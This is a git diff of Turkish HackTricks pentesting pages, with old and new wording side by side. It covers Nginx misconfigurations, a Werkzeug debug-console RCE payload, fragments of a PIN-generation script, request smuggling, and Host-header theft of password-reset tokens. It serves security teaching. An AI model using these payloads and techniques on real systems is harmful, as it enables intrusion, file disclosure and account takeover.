Bu yapılandırmada, `/etc/nginx` kök dizin olarak belirlenmiştir. Bu ayar, `/hello.txt` gibi belirtilen kök dizin içindeki dosyalara erişim sağlar. Ancak, yalnızca belirli bir konum (`/hello.txt`) tanımlandığını not etmek önemlidir. Kök konumu için bir yapılandırma yoktur (`location / {...}`). Bu eksiklik, kök direktifinin küresel olarak uygulanması anlamına gelir ve kök yolu `/` altındaki dosyalara erişim sağlar.
Bu yapılandırmada, `/etc/nginx` kök dizin olarak belirlenmiştir. Bu ayar, `/hello.txt` gibi belirtilen kök dizin içindeki dosyalara erişim sağlar. Ancak, yalnızca belirli bir konum (`/hello.txt`) tanımlandığını not etmek önemlidir. Kök konumu için bir yapılandırma yoktur (`location / {...}`). Bu eksiklik, kök direktifinin küresel olarak uygulanması anlamına gelir ve kök yolu `/` için yapılan isteklerin `/etc/nginx` altındaki dosyalara erişmesine olanak tanır.
Bu yapılandırmadan kaynaklanan kritik bir güvenlik dikkati vardır. `GET /nginx.conf` gibi basit bir `GET` isteği, `/etc/nginx/nginx.conf` konumundaki Nginx yapılandırma dosyasını sunarak hassas bilgileri açığa çıkarabilir. Kökü daha az hassas bir dizine, örneğin `/etc` olarak ayarlamak bu riski azaltabilir, ancak yine de diğer kritik dosyalara, diğer yapılandırma dosyalarına, erişim günlüklerine ve hatta HTTP temel kimlik doğrulaması için kullanılan şifrelenmiş kimlik bilgilerine istenmeyen erişim izni verebilir.
Bu yapılandırmadan kaynaklanan kritik bir güvenlik dikkati vardır. `GET /nginx.conf` gibi basit bir `GET` isteği, `/etc/nginx/nginx.conf` konumundaki Nginx yapılandırma dosyasını sunarak hassas bilgileri açığa çıkarabilir. Kökü daha az hassas bir dizine, örneğin `/etc` olarak ayarlamak bu riski azaltabilir, ancak yine de diğer kritik dosyalara, diğer yapılandırma dosyalarına, erişim günlüklerine ve hatta HTTP temel kimlik doğrulaması için kullanılan şifrelenmiş kimlik bilgilerine istenmeyen erişime izin verebilir.
## Alias LFI Yanlış Yapılandırması <a href="#alias-lfi-misconfiguration" id="alias-lfi-misconfiguration"></a>
Nginx yapılandırma dosyalarında, "location" direktifleri için dikkatli bir inceleme gereklidir. Yerel Dosya Dahil Etme (LFI) olarak bilinen bir zafiyet, aşağıdaki gibi bir yapılandırma aracılığıyla istemeden tanıtılabilir:
Nginx yapılandırma dosyalarında, "location" direktifleri için dikkatli bir inceleme gereklidir. Aşağıdaki gibi bir yapılandırma aracılığıyla istemeden Yerel Dosya Dahil Etme (LFI) olarak bilinen bir zafiyet tanıtılabilir:
```
location /imgs {
alias /path/images/;
}
```
Bu yapılandırma, sunucunun `/imgs../flag.txt` gibi istekleri, hedef dizinin dışındaki dosyalara erişim girişimi olarak yorumlaması nedeniyle LFI saldırılarına açıktır ve bu da etkili bir şekilde `/path/images/../flag.txt` olarak çözülür. Bu hata, saldırganların web üzerinden erişilememesi gereken dosyaları sunucunun dosya sisteminden almasına olanak tanır.
Bu yapılandırma, sunucunun `/imgs../flag.txt` gibi istekleri, hedef dizin dışındaki dosyalara erişim girişimi olarak yorumlaması nedeniyle LFI saldırılarına açıktır ve bu da `/path/images/../flag.txt` olarak çözülmektedir. Bu hata, saldırganların web üzerinden erişilememesi gereken dosyaları sunucunun dosya sisteminden almasına olanak tanır.
Bu güvenlik açığını azaltmak için yapılandırma şu şekilde ayarlanmalıdır:
```
@ -85,7 +85,7 @@ deny all;
{% hint style="danger" %}
Zayıf değişkenler `$uri` ve `$document_uri` ve bunlar `$request_uri` ile değiştirilerek düzeltilebilir.
Bir regex de şu şekilde zayıf olabilir:
Bir regex de zayıf olabilir:
`location ~ /docs/([^/])? { … $1 … }` - Zayıf&#x20;
@ -100,7 +100,7 @@ location / {
return 302 https://example.com$uri;
}
```
HTTP isteklerinde \r (Carriage Return) ve \n (Line Feed) karakterleri yeni satır karakterlerini belirtir ve URL kodlu formları `%0d%0a` olarak temsil edilir. Bu karakterleri yanlış yapılandırılmış bir sunucuya yapılan bir isteğe (örneğin, `http://localhost/%0d%0aDetectify:%20clrf`) dahil etmek, sunucunun `Detectify` adında yeni bir başlık oluşturmasına neden olur. Bu, $uri değişkeninin URL kodlu yeni satır karakterlerini çözmesinden kaynaklanır ve yanıt içinde beklenmeyen bir başlık oluşur:
HTTP isteklerinde \r (Carriage Return) ve \n (Line Feed) karakterleri yeni satır karakterlerini belirtir ve URL kodlu formları `%0d%0a` olarak temsil edilir. Bu karakterleri yanlış yapılandırılmış bir sunucuya yapılan bir isteğe (örneğin, `http://localhost/%0d%0aDetectify:%20clrf`) dahil etmek, sunucunun `Detectify` adında yeni bir başlık oluşturmasına neden olur. Bu, $uri değişkeninin URL kodlu yeni satır karakterlerini çözmesi nedeniyle gerçekleşir ve yanıt içinde beklenmedik bir başlık oluşur:
```
HTTP/1.1 302 Moved Temporarily
Server: nginx/1.19.3
@ -117,7 +117,7 @@ Ayrıca bu teknik [**bu konuşmada açıklanmıştır**](https://www.youtube.com
* `https://example.com/%20X` - Herhangi bir HTTP kodu
* `https://example.com/%20H` - 400 Bad Request
Eğer savunmasızsa, ilki "X" herhangi bir HTTP yöntemi olarak dönecek ve ikincisi H geçerli bir yöntem olmadığından bir hata dönecektir. Böylece sunucu şunları alacak: `GET / H HTTP/1.1` ve bu hata tetiklenecektir.
Eğer savunmasızsa, ilki "X" herhangi bir HTTP yöntemi olarak dönecek ve ikincisi H geçerli bir yöntem olmadığından bir hata dönecektir. Böylece sunucu şunları alacak: `GET / H HTTP/1.1` ve bu hatayı tetikleyecektir.
Diğer tespit örnekleri şunlar olabilir:
@ -126,13 +126,13 @@ Diğer tespit örnekleri şunlar olabilir:
O konuşmada sunulan bazı savunmasız yapılandırmalar şunlardı:
* **`$uri`**'nin son URL'de olduğu gibi ayarlandığını not edin.
* **`$uri`**'nin son URL'de olduğu gibi ayarlandığına dikkat edin.
```
location ^~ /lite/api/ {
proxy_pass http://lite-backend$uri$is_args$args;
}
```
* Tekrar **`$uri`**'nin URL'de (bu sefer bir parametre içinde) olduğunu not edin.
* Dikkat edin ki yine **`$uri`** URL'de (bu sefer bir parametre içinde) bulunmaktadır.
```
location ~ ^/dna/payment {
rewrite ^/dna/([^/]+) /registered/main.pl?cmd=unifiedPayment&context=$1&native_uri=$uri break;
@ -146,7 +146,7 @@ proxy_pass https://company-bucket.s3.amazonaws.com$uri;
```
### Herhangi bir değişken
**Kullanıcı tarafından sağlanan verilerin**, belirli koşullar altında **Nginx değişkeni** olarak ele alınabileceği keşfedilmiştir. Bu davranışın nedeni biraz belirsiz kalmakla birlikte, nadir ya da doğrulaması basit değildir. Bu anomali, HackerOne'da yayınlanan bir güvenlik raporunda vurgulanmıştır, [buradan](https://hackerone.com/reports/370094) görüntülenebilir. Hata mesajı üzerindeki daha fazla araştırma, bunun [Nginx'in kod tabanındaki SSI filtre modülünde](https://github.com/nginx/nginx/blob/2187586207e1465d289ae64cedc829719a048a39/src/http/modules/ngx_http_ssi_filter_module.c#L365) meydana geldiğini belirlemiş ve Sunucu Tarafı Dahil Etmelerin (SSI) kök neden olduğunu ortaya çıkarmıştır.
**Kullanıcı tarafından sağlanan verilerin**, belirli koşullar altında **Nginx değişkeni** olarak ele alınabileceği keşfedilmiştir. Bu davranışın nedeni biraz belirsiz kalmakta, ancak nadir ya da doğrulaması basit değildir. Bu anomali, HackerOne'da yayınlanan bir güvenlik raporunda vurgulanmıştır, [buradan](https://hackerone.com/reports/370094) görüntülenebilir. Hata mesajı üzerindeki daha fazla araştırma, bunun [Nginx'in kod tabanındaki SSI filtre modülünde](https://github.com/nginx/nginx/blob/2187586207e1465d289ae64cedc829719a048a39/src/http/modules/ngx_http_ssi_filter_module.c#L365) meydana geldiğini belirlemiş ve Sunucu Tarafı Dahil Etmelerin (SSI) kök neden olduğunu ortaya çıkarmıştır.
Bu **yanlış yapılandırmayı tespit etmek** için, değişken yazdırmasını test etmek amacıyla bir referer başlığı ayarlamayı içeren aşağıdaki komut çalıştırılabilir:
```bash
@ -156,7 +156,7 @@ Bu yanlış yapılandırmanın sistemler arasında taranması, bir kullanıcın
## Ham arka uç yanıtı okuma
Nginx, arka uç tarafından üretilen hataların ve HTTP başlıklarının yakalanmasına olanak tanıyan `proxy_pass` aracılığıyla bir özellik sunar; bu, dahili hata mesajlarını ve başlıkları gizlemeyi amaçlar. Bu, Nginx'in arka uç hatalarına yanıt olarak özel hata sayfaları sunmasıyla gerçekleştirilir. Ancak, Nginx geçersiz bir HTTP isteğiyle karşılaştığında zorluklar ortaya çıkar. Böyle bir istek, alındığı gibi arka uca iletilir ve arka ucun ham yanıtı, Nginx'in müdahalesi olmadan doğrudan istemciye gönderilir.
Nginx, arka uç tarafından üretilen hataları ve HTTP başlıklarını yakalamak için `proxy_pass` aracılığıyla bir özellik sunar; bu, dahili hata mesajlarını ve başlıkları gizlemeyi amaçlar. Bu, Nginx'in arka uç hatalarına yanıt olarak özel hata sayfaları sunmasıyla gerçekleştirilir. Ancak, Nginx geçersiz bir HTTP isteğiyle karşılaştığında zorluklar ortaya çıkar. Böyle bir istek, alındığı gibi arka uca iletilir ve arka ucun ham yanıtı, Nginx'in müdahalesi olmadan doğrudan istemciye gönderilir.
Bir uWSGI uygulamasını içeren örnek bir senaryoyu düşünün:
```python
@ -172,7 +172,7 @@ proxy_intercept_errors on;
proxy_hide_header Secret-Header;
}
```
* [**proxy\_intercept\_errors**](http://nginx.org/en/docs/http/ngx\_http\_proxy\_module.html#proxy\_intercept\_errors): Bu direktif, Nginx'in 300'den büyük durum kodlarına sahip arka uç yanıtları için özel bir yanıt sunmasını sağlar. Örneğimiz olan uWSGI uygulaması için, `500 Hatası` yanıtının Nginx tarafından yakalanıp işlenmesini garanti eder.
* [**proxy\_intercept\_errors**](http://nginx.org/en/docs/http/ngx\_http\_proxy\_module.html#proxy\_intercept\_errors): Bu direktif, Nginx'in 300'den büyük durum kodlarına sahip arka uç yanıtları için özel bir yanıt sunmasını sağlar. Örneğimizdeki uWSGI uygulaması için, `500 Hatası` yanıtının Nginx tarafından yakalanıp işlenmesini garanti eder.
* [**proxy\_hide\_header**](http://nginx.org/en/docs/http/ngx\_http\_proxy\_module.html#proxy\_hide\_header): Adından da anlaşılacağı gibi, bu direktif belirtilen HTTP başlıklarını istemciden gizler, gizliliği ve güvenliği artırır.
Geçerli bir `GET` isteği yapıldığında, Nginx bunu normal şekilde işler ve herhangi bir gizli başlık ifşa etmeden standart bir hata yanıtı döner. Ancak, geçersiz bir HTTP isteği bu mekanizmayı atlayarak, gizli başlıklar ve hata mesajları da dahil olmak üzere ham arka uç yanıtlarının ifşasına neden olur.
@ -192,10 +192,10 @@ Daha fazla bilgi için [Danny Robinson ve Rotem Bar](https://medium.com/appsflye
* `X-Accel-Redirect`: Nginx'e bir isteği belirtilen bir konuma dahili olarak yönlendirmesini belirtir.
* `X-Accel-Buffering`: Nginx'in yanıtı tamponlayıp tamponlamayacağını kontrol eder.
* `X-Accel-Charset`: X-Accel-Redirect kullanıldığında yanıt için karakter setini ayarlar.
* `X-Accel-Expires`: X-Accel-Redirect kullanıldığında yanıtın son kullanma süresini ayarlar.
* `X-Accel-Expires`: X-Accel-Redirect kullanıldığında yanıt için son kullanma süresini ayarlar.
* `X-Accel-Limit-Rate`: X-Accel-Redirect kullanıldığında yanıtlar için transfer hızını sınırlar.
Örneğin, **`X-Accel-Redirect`** başlığı, nginx'de dahili bir **yönlendirme** oluşturacaktır. Dolayısıyla, **`root /`** gibi bir nginx yapılandırmasına sahip olmak ve web sunucusundan **`X-Accel-Redirect: .env`** ile bir yanıt almak, nginx'in **`/.env`** içeriğini göndermesine neden olacaktır (Path Traversal).
Örneğin, **`X-Accel-Redirect`** başlığı, nginx'de dahili bir **yönlendirme** oluşturur. Yani, **`root /`** gibi bir nginx yapılandırmasına sahip olmak ve web sunucusundan **`X-Accel-Redirect: .env`** ile bir yanıt almak, nginx'in **`/.env`** içeriğini göndermesine neden olacaktır (Path Traversal).
### **Map Direktifinde Varsayılan Değer**
@ -228,14 +228,14 @@ resolver 8.8.8.8;
```
### **`proxy_pass` ve `internal` Direktifleri**
**`proxy_pass`** direktifi, istekleri diğer sunuculara, ister dahili ister harici olarak yönlendirmek için kullanılır. **`internal`** direktifi, belirli konumların yalnızca Nginx içinde erişilebilir olmasını sağlar. Bu direktifler kendiliğinden zafiyet oluşturmasa da, yapılandırmaları dikkatli bir şekilde incelenmelidir, aksi takdirde güvenlik açıkları oluşabilir.
**`proxy_pass`** direktifi, istekleri diğer sunuculara, ister dahili ister harici olarak yönlendirmek için kullanılır. **`internal`** direktifi, belirli konumların yalnızca Nginx içinde erişilebilir olmasını sağlar. Bu direktifler kendileri bir zafiyet olmasa da, yapılandırmaları güvenlik açıklarını önlemek için dikkatli bir şekilde incelenmelidir.
## proxy\_set\_header Upgrade & Connection
Eğer nginx sunucusu Upgrade ve Connection başlıklarını geçirecek şekilde yapılandırılmışsa, korunan/dahili uç noktalarına erişmek için bir [**h2c Smuggling saldırısı**](../../pentesting-web/h2c-smuggling.md) gerçekleştirilebilir.
{% hint style="danger" %}
Bu zafiyet, bir saldırganın **`proxy_pass` uç noktası ile doğrudan bir bağlantı kurmasına** olanak tanır (`http://backend:9999` bu durumda) ve içeriği nginx tarafından kontrol edilmeyecektir.
Bu zafiyet, bir saldırganın **`proxy_pass` uç noktası ile doğrudan bir bağlantı kurmasına** izin verecektir (`http://backend:9999` bu durumda) ve içeriği nginx tarafından kontrol edilmeyecektir.
{% endhint %}
`/flag` çalmak için zayıf yapılandırma örneği [buradan](https://bishopfox.com/blog/h2c-smuggling-request):
@ -259,7 +259,7 @@ deny all;
}
```
{% hint style="warning" %}
Not edin ki `proxy_pass` belirli bir **yol** olan `http://backend:9999/socket.io` adresine işaret etse bile bağlantı `http://backend:9999` ile kurulacaktır, bu nedenle o iç uç noktasındaki **herhangi bir diğer yolla iletişim kurabilirsiniz. Bu nedenle, proxy_pass URL'sinde bir yol belirtilip belirtilmediği önemli değildir.**
Not edin ki `proxy_pass` belirli bir **yola** işaret etse bile, bağlantı `http://backend:9999` ile kurulacaktır, bu nedenle o iç uç noktası içinde **herhangi bir başka yolla iletişim kurabilirsiniz. Bu nedenle, proxy_pass URL'sinde bir yol belirtilip belirtilmediği önemli değildir.**
{% endhint %}
## Kendin dene
@ -272,7 +272,7 @@ Detectify, bu makalede tartışılan bazı yanlış yapılandırmalarla kendi sa
### [GIXY](https://github.com/yandex/gixy)
Gixy, Nginx yapılandırmasını analiz etmek için bir araçtır. Gixy'nin ana hedefi güvenlik yanlış yapılandırmalarını önlemek ve hata tespitini otomatikleştirmektir.
Gixy, Nginx yapılandırmasını analiz etmek için bir araçtır. Gixy'nin ana hedefi, güvenlik yanlış yapılandırmalarını önlemek ve hata tespitini otomatikleştirmektir.
### [Nginxpwner](https://github.com/stark0de/nginxpwner)
@ -284,9 +284,9 @@ Nginxpwner, yaygın Nginx yanlış yapılandırmalarını ve güvenlik açıklar
* [**http://blog.zorinaq.com/nginx-resolver-vulns/**](http://blog.zorinaq.com/nginx-resolver-vulns/)
* [**https://github.com/yandex/gixy/issues/115**](https://github.com/yandex/gixy/issues/115)
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. Recon'dan raporlamaya kadar 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin. Pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell açmaları ve eğlenmeleri için biraz zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin; bu araçlar keşiften raporlamaya kadar uzanır. Biz pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell'leri patlatmaları ve eğlenmeleri için biraz zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
@ -299,8 +299,8 @@ GCP Hacking'i öğrenin ve pratik yapın: <img src="/.gitbook/assets/grte.png" a
<summary>HackTricks'i Destekleyin</summary>
* [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** bizi takip edin.**
* **Hacking ipuçlarını paylaşmak için [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin.**
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter**'da **bizi takip edin** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Hacking ipuçlarını paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub depolarına PR gönderin.
</details>
{% endhint %}

View file

@ -15,21 +15,21 @@ GCP Hacking'i öğrenin ve pratik yapın: <img src="/.gitbook/assets/grte.png" a
</details>
{% endhint %}
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. Recon'dan raporlamaya kadar 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin. Pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell'leri patlatmaları ve eğlenmeleri için biraz zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin; keşiften raporlamaya kadar. Biz pentester'ların yerini almıyoruz - onlara daha derinlemesine inceleme, shell açma ve eğlenme fırsatı vermek için özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
## Konsol RCE
Eğer debug aktifse `/console`'a erişmeyi deneyebilir ve RCE elde edebilirsiniz.
Eğer debug aktifse `/console` erişmeyi deneyebilir ve RCE elde edebilirsiniz.
```python
__import__('os').popen('whoami').read();
```
![](<../../.gitbook/assets/image (117).png>)
İnternette [şu](https://github.com/its-arun/Werkzeug-Debug-RCE) gibi birkaç istismar da bulunmaktadır veya metasploit'te bir tane.
Ayrıca internette [şu](https://github.com/its-arun/Werkzeug-Debug-RCE) gibi birkaç istismar bulunmaktadır veya metasploit'te bir tane.
## Pin Koruması - Yol Traversali
@ -43,7 +43,7 @@ The console is locked and needs to be unlocked by entering the PIN.
You can find the PIN printed out on the standard output of your
shell that runs the server
```
"console locked" senaryosuyla ilgili bir mesaj, Werkzeug'un hata ayıklama arayüzüne erişmeye çalışırken karşılaşılır ve konsolu kilidini açmak için bir PIN gerekliliğini belirtir. Konsol PIN'ini istismar etmek için, Werkzeug'un hata ayıklama başlatma dosyasında (`__init__.py`) PIN oluşturma algoritmasını analiz etme önerisi yapılır. PIN oluşturma mekanizması, [**Werkzeug kaynak kodu deposu**](https://github.com/pallets/werkzeug/blob/master/src/werkzeug/debug/\_\_init\_\_.py) üzerinden incelenebilir, ancak potansiyel sürüm farklılıkları nedeniyle gerçek sunucu kodunun bir dosya geçiş açığı aracılığıyla temin edilmesi önerilir.
Bir "konsol kilitli" senaryosuyla ilgili bir mesaj, Werkzeug'un hata ayıklama arayüzüne erişmeye çalışırken karşılaşılır ve konsolu açmak için bir PIN gereksinimini belirtir. Konsol PIN'ini istismar etmek için, Werkzeug'un hata ayıklama başlatma dosyasındaki PIN oluşturma algoritmasını analiz etme önerisi yapılır (`__init__.py`). PIN oluşturma mekanizması, [**Werkzeug kaynak kodu deposu**](https://github.com/pallets/werkzeug/blob/master/src/werkzeug/debug/\_\_init\_\_.py) üzerinden incelenebilir, ancak potansiyel sürüm farklılıkları nedeniyle gerçek sunucu kodunun bir dosya geçiş açığı aracılığıyla temin edilmesi tavsiye edilir.
Konsol PIN'ini istismar etmek için iki set değişken gereklidir: `probably_public_bits` ve `private_bits`:
@ -57,7 +57,7 @@ Konsol PIN'ini istismar etmek için iki set değişken gereklidir: `probably_pub
#### **`private_bits`**
* **`uuid.getnode()`**: Mevcut makinenin MAC adresini alır, `str(uuid.getnode())` bunu ondalık formata çevirir.
* **Sunucunun MAC adresini belirlemek için**, uygulamanın kullandığı aktif ağ arayüzünü tanımlamak gerekir (örneğin, `ens3`). Belirsizlik durumunda, **`/proc/net/arp`**'yi sızdırarak cihaz kimliğini bulmak, ardından **`/sys/class/net/<device id>/address`**'den MAC adresini çıkarmak gerekir.
* **Sunucunun MAC adresini belirlemek için**, uygulamanın kullandığı aktif ağ arayüzünü tanımlamak gerekir (örneğin, `ens3`). Belirsizlik durumunda, **`/proc/net/arp`** sızıntısı yaparak cihaz kimliğini bulmak, ardından **`/sys/class/net/<device id>/address`**'den MAC adresini çıkarmak gerekir.
* Onaltılık bir MAC adresinin ondalık formata dönüştürülmesi aşağıda gösterildiği gibi yapılabilir:
```python
@ -65,7 +65,7 @@ Konsol PIN'ini istismar etmek için iki set değişken gereklidir: `probably_pub
>>> print(0x5600027a23ac)
94558041547692
```
* **`get_machine_id()`**: `/etc/machine-id` veya `/proc/sys/kernel/random/boot_id`'den verileri, `/proc/self/cgroup`'un sonundaki ilk satırla (`/`) birleştirir.
* **`get_machine_id()`**: `/etc/machine-id` veya `/proc/sys/kernel/random/boot_id`'den alınan verileri, son eğik çizgiden (`/`) sonra `/proc/self/cgroup`'un ilk satırıyla birleştirir.
<details>
@ -157,7 +157,7 @@ rv = num
print(rv)
```
Bu script, birleştirilmiş bitleri hashleyerek, belirli tuzlar (`cookiesalt` ve `pinsalt`) ekleyerek ve çıktıyı formatlayarak PIN'i üretir. `probably_public_bits` ve `private_bits` için gerçek değerlerin hedef sistemden doğru bir şekilde elde edilmesi gerektiğini unutmamak önemlidir; bu, üretilen PIN'in Werkzeug konsolu tarafından beklenenle eşleşmesini sağlar.
Bu script, birleştirilmiş bitleri hashleyerek, belirli tuzlar (`cookiesalt` ve `pinsalt`) ekleyerek ve çıktıyı formatlayarak PIN'i üretir. `probably_public_bits` ve `private_bits` için gerçek değerlerin hedef sistemden doğru bir şekilde elde edilmesi gerektiğini unutmamak önemlidir, böylece üretilen PIN, Werkzeug konsolunun beklediği ile eşleşir.
{% hint style="success" %}
Eğer **eski bir sürüm** Werkzeug kullanıyorsanız, **hashing algoritmasını md5** olarak değiştirmeyi deneyin.
@ -165,9 +165,9 @@ Eğer **eski bir sürüm** Werkzeug kullanıyorsanız, **hashing algoritmasını
## Werkzeug Unicode karakterleri
[**bu sorun**](https://github.com/pallets/werkzeug/issues/2833)'da gözlemlendiği gibi, Werkzeug başlıklarda Unicode karakterleri ile bir isteği kapatmaz. Ve [**bu yazıda**](https://mizu.re/post/twisty-python) açıklandığı gibi, bu bir CL.0 Request Smuggling ığına neden olabilir.
[**bu sorun**](https://github.com/pallets/werkzeug/issues/2833)'da gözlemlendiği gibi, Werkzeug başlıklarda Unicode karakterleri ile bir isteği kapatmaz. Ve [**bu yazıda**](https://mizu.re/post/twisty-python) açıklandığı gibi, bu bir CL.0 Request Smuggling zafiyetine neden olabilir.
Bu, Werkzeug'ta bazı **Unicode** karakterlerin gönderilmesinin mümkün olması ve bunun sunucunun **çökmesine** neden olmasındandır. Ancak, HTTP bağlantısı **`Connection: keep-alive`** başlığı ile oluşturulmuşsa, isteğin gövdesi okunmayacak ve bağlantıık kalacaktır, bu nedenle isteğin **gövdesi** bir sonraki **HTTP isteği** olarak işlenecektir.
Bunun nedeni, Werkzeug'te bazı **Unicode** karakterlerin gönderilmesinin mümkün olması ve bunun sunucunun **çökmesine** neden olmasıdır. Ancak, HTTP bağlantısı **`Connection: keep-alive`** başlığı ile oluşturulmuşsa, isteğin gövdesi okunmayacak ve bağlantıık kalacaktır, bu nedenle isteğin **gövdesi** bir **sonraki HTTP isteği** olarak işlenecektir.
## Otomatik Sömürü
@ -180,9 +180,9 @@ Bu, Werkzeug'ta bazı **Unicode** karakterlerin gönderilmesinin mümkün olmas
* [**https://github.com/pallets/werkzeug/issues/2833**](https://github.com/pallets/werkzeug/issues/2833)
* [**https://mizu.re/post/twisty-python**](https://mizu.re/post/twisty-python)
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin; bu araçlar keşiften raporlamaya kadar uzanır. Pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell'leri patlatmaları ve eğlenmeleri için biraz zaman kazandırmak amacıyla özel araçlar, tespit ve sömürü modülleri geliştiriyoruz.
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin; keşiften raporlamaya kadar. Pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell'leri patlatmaları ve eğlenmeleri için biraz zaman kazandırmak amacıyla özel araçlar, tespit ve sömürü modülleri geliştiriyoruz.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
@ -196,7 +196,7 @@ GCP Hacking'i öğrenin ve pratik yapın: <img src="/.gitbook/assets/grte.png" a
* [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**'i takip edin.**
* **Hacking ipuçlarını paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin.
* **Hacking ipuçlarını paylaşmak için [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin.**
</details>
{% endhint %}

View file

@ -9,29 +9,29 @@ GCP Hacking'i öğrenin ve pratik yapın: <img src="/.gitbook/assets/grte.png" a
<summary>HackTricks'i Destekleyin</summary>
* [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**'ı takip edin.**
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter**'da **bizi takip edin** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Hacking hilelerini paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin.
</details>
{% endhint %}
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. Recon'dan raporlamaya kadar 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin. Pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell açmaları ve eğlenmeleri için zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin; bu araçlar keşiften raporlamaya kadar uzanır. Pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell açmaları ve eğlenmeleri için zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
### Host başlığı
Birçok kez arka uç, bazı işlemleri gerçekleştirmek için **Host başlığını** güvenilir olarak kabul eder. Örneğin, bu değeri **şifre sıfırlamak için kullanılacak alan adı** olarak kullanabilir. Yani, şifrenizi sıfırlamak için bir bağlantı içeren bir e-posta aldığınızda, kullanılan alan adı Host başlığında belirttiğiniz alandır. Ardından, diğer kullanıcıların şifre sıfırlama taleplerini yapabilir ve alan adını kontrolünüzde olan bir alan adı ile değiştirerek şifre sıfırlama kodlarını çalabilirsiniz. [WriteUp](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2).
